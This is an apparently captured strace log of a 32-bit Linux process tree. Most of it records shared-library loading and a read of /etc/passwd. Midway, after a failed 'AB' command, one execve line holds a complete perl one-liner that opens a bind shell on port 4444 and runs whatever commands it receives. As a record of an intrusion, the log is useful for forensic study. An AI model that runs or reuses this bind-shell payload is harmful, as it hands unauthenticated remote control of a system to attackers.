5606  07:09:46.028815 mmap2(0xb7da2000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7da2000

5606  07:09:46.028829 close(1)          = 0

5606  07:09:46.028856 munmap(0xb7f32000, 29913) = 0

5606  07:09:46.028873 open("/etc/ld.so.cache", O_RDONLY) = 1

5606  07:09:46.028886 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5606  07:09:46.028903 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f32000

5606  07:09:46.028913 close(1)          = 0

5606  07:09:46.028923 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5606  07:09:46.028938 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

5606  07:09:46.028952 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

5606  07:09:46.029043 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

5606  07:09:46.029060 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d82000

5606  07:09:46.029072 mmap2(0xb7d8a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d8a000

5606  07:09:46.029088 close(1)          = 0

5606  07:09:46.029101 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5606  07:09:46.029114 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

5606  07:09:46.029135 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

5606  07:09:46.029267 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

5606  07:09:46.029285 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d77000

5606  07:09:46.029297 mmap2(0xb7d80000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d80000

5606  07:09:46.029313 close(1)          = 0

5606  07:09:46.029334 munmap(0xb7f32000, 29913) = 0

5606  07:09:46.029351 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

5606  07:09:46.029365 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

5606  07:09:46.029377 _llseek(1, 0, [0], SEEK_CUR) = 0

5606  07:09:46.029389 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

5606  07:09:46.029406 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f39000

5606  07:09:46.029417 _llseek(1, 1624, [1624], SEEK_SET) = 0

5606  07:09:46.029432 munmap(0xb7f39000, 1624) = 0

5606  07:09:46.029442 close(1)          = 0

5606  07:09:46.029471 getpgrp()         = 3831

5606  07:09:46.029481 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

5606  07:09:46.029496 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

5606  07:09:46.029514 brk(0x8101000)    = 0x8101000

5606  07:09:46.029546 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5606  07:09:46.029561 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5606  07:09:46.029576 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5606  07:09:46.029613 brk(0x8102000)    = 0x8102000

5606  07:09:46.029649 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5606  07:09:46.029670 stat64("/sbin/AB", 0xbfb2f188) = -1 ENOENT (No such file or directory)

5606  07:09:46.029682 stat64("/bin/AB", 0xbfb2f188) = -1 ENOENT (No such file or directory)

5606  07:09:46.029694 stat64("/usr/sbin/AB", 0xbfb2f188) = -1 ENOENT (No such file or directory)

5606  07:09:46.029706 stat64("/usr/bin/AB", 0xbfb2f188) = -1 ENOENT (No such file or directory)

5606  07:09:46.029719 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

5606  07:09:46.029734 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7dad6f8) = 5607

5607  07:09:46.029779 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5607  07:09:46.029797 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

5607  07:09:46.029811 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

5607  07:09:46.029823 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

5607  07:09:46.029839 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5607  07:09:46.029855 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5607  07:09:46.029868 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

5607  07:09:46.029923 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

5607  07:09:46.029937 --- SIGPIPE (Broken pipe) @ 0 (0) ---

5607  07:09:46.030005 exit_group(127)   = ?

5606  07:09:46.045826 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5606  07:09:46.045858 --- SIGCHLD (Child exited) @ 0 (0) ---

5606  07:09:46.045872 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 5607

5606  07:09:46.045889 waitpid(-1, 0xbfb2ee08, WNOHANG) = -1 ECHILD (No child processes)

5606  07:09:46.045899 sigreturn()       = ? (mask now [])

5606  07:09:46.045922 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

5606  07:09:46.045937 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5606  07:09:46.045949 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

5606  07:09:46.045961 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

5606  07:09:46.045985 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5606  07:09:46.045997 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

5606  07:09:46.046031 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5606  07:09:46.046051 stat64("/sbin/perl", 0xbfb2f1b8) = -1 ENOENT (No such file or directory)

5606  07:09:46.046064 stat64("/bin/perl", 0xbfb2f1b8) = -1 ENOENT (No such file or directory)

5606  07:09:46.046075 stat64("/usr/sbin/perl", 0xbfb2f1b8) = -1 ENOENT (No such file or directory)

5606  07:09:46.046087 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

5606  07:09:46.046105 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

5606  07:09:46.046131 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

5606  07:09:46.046145 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7dad6f8) = 5608

5608  07:09:46.046192 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5608  07:09:46.046210 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

5608  07:09:46.046224 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

5608  07:09:46.046236 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

5608  07:09:46.046251 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5608  07:09:46.046267 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5608  07:09:46.046319 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

5608  07:09:46.046371 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

5608  07:09:46.046458 brk(0)            = 0x8153000

5608  07:09:46.046479 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5608  07:09:46.046494 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f3b000

5608  07:09:46.046511 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

5608  07:09:46.046528 open("/etc/ld.so.cache", O_RDONLY) = 1

5608  07:09:46.046540 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5608  07:09:46.046557 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f33000

5608  07:09:46.046568 close(1)          = 0

5608  07:09:46.046579 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5608  07:09:46.046594 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

5608  07:09:46.046608 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

5608  07:09:46.046701 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

5608  07:09:46.046719 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f2f000

5608  07:09:46.046731 mmap2(0xb7f31000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f31000

5608  07:09:46.046748 close(1)          = 0

5608  07:09:46.046763 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5608  07:09:46.046786 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

5608  07:09:46.046801 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

5608  07:09:46.046890 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

5608  07:09:46.046908 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f0a000

5608  07:09:46.046919 mmap2(0xb7f2d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f2d000

5608  07:09:46.046935 close(1)          = 0

5608  07:09:46.046947 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5608  07:09:46.046961 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

5608  07:09:46.046976 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

5608  07:09:46.047063 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

5608  07:09:46.047080 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f09000

5608  07:09:46.047093 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ef1000

5608  07:09:46.047104 mmap2(0xb7f05000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f05000

5608  07:09:46.047120 mmap2(0xb7f07000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f07000

5608  07:09:46.047134 close(1)          = 0

5608  07:09:46.047146 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5608  07:09:46.047159 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

5608  07:09:46.047173 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

5608  07:09:46.047266 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

5608  07:09:46.047266 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7da2000

5608  07:09:46.047266 mmap2(0xb7eeb000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7eeb000

5608  07:09:46.047266 mmap2(0xb7eee000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7eee000

5608  07:09:46.047267 close(1)          = 0

5608  07:09:46.047271 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5608  07:09:46.047285 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

5608  07:09:46.047300 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

5608  07:09:46.047391 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

5608  07:09:46.047408 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d70000

5608  07:09:46.047420 mmap2(0xb7d79000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d79000

5608  07:09:46.047434 mmap2(0xb7d7b000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d7b000

5608  07:09:46.047448 close(1)          = 0

5608  07:09:46.047472 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d6f000

5608  07:09:46.047485 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d6f8c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

